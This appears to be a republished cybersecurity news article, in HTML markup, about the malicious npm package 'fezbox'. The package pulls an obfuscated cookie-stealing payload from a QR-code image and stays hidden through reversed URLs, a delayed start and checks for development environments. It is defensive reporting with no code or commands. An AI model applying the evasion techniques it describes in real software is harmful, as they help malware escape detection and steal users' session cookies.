Código HTML do Conteúdo
Post: Fezbox Malware: The NPM Package That Steals Cookies with QR Codes - Against Invaders - Notícias de CyberSecurity para humanos.
<div>
<div data-element_type="widget" data-id="914a4f5" data-widget_type="shortcode.default">
<div>
<div>
<p><span><b><a href="https://www.redhotcyber.com/post/author/redazione/" target="_blank">Redazione RHC</a>:26 September 2025 15:55</b></span></p>
<p>Researchers discovered a malicious package called <strong>fezbox</strong> in <strong>npm</strong> that steals victims’ cookies. To ensure the malicious activity remains undetected, <em>QR codes are used to download the malware from the attackers’ server.</em></p>
<p>According to <a href="https://socket.dev/blog/malicious-fezbox-npm-package-steals-browser-passwords-from-cookies-via-innovative-qr-code" target="_blank">Socket</a> researchers, attackers have found <em>a new use for QR codes: hiding malicious code within them.</em> Analysts have reported that the packet contains hidden instructions to download a JPG image with a QR code, which is then processed to launch an obfuscated payload as part of the second stage of the attack.</p>
<p>At the time of the malware’s discovery, the package had been downloaded at least <strong>327 times before npm administrators removed it.</strong> <a href="https://www.bleepingcomputer.com/news/security/npm-package-caught-using-qr-code-to-fetch-cookie-stealing-malware/" target="_blank">Bleeping Computer</a> notes that the main malicious payload is located in the package’s dist/fezbox.cjs file (using version 1.3.0 as an example). The code in the file has been minified and made easier to read after formatting.</p>
<p>The malware also checks whether the application is running in a development environment to evade detection <em>. “Attackers don’t want to risk detection in a virtual or non-production environment, so they add restrictions on when and how their exploit operates,”</em> the researchers explain. <em>“If no issues are detected, after 120 seconds, it parses and executes the QR code at the address in the inverted string.”</em></p>
<p>The result, once logged in, is a URL. According to experts, <strong>storing URLs in reverse order is a masquerade technique used to circumvent static analysis tools</strong> that look for URLs (those starting with http(s)://) in the code.</p>
<p>Unlike the QR codes we typically encounter in real life, this one is unusually dense and contains much more data. As journalists noted, <strong>it’s impossible to read with a standard phone camera.</strong> The attackers specifically crafted the QR code to transmit obfuscated code that can be parsed from the packet. The obfuscated payload reads the cookie via <a href="https://developer.mozilla.org/en-US/docs/Web/API/Document/cookie" target="_blank">document.cookie</a> .</p>
<p>The discovery of this malware <strong>demonstrates a new approach to QR code abuse.</strong> An infected computer can use them to communicate with its command and control server, while to a proxy server or network security tool, this will appear as normal image traffic.</p>
<div>
<div>
<div>
<div>
<p><b><span>Redazione</span></b><br /><span>The editorial team of Red Hot Cyber consists of a group of individuals and anonymous sources who actively collaborate to provide early information and news on cybersecurity and computing in general.</span></p>
<p><a href="https://www.redhotcyber.com/post/author/redazione/" target="_blank">Lista degli articoli</a></p>
</div>
</div>
</div>
</div>
</div>
</div>
</div></div>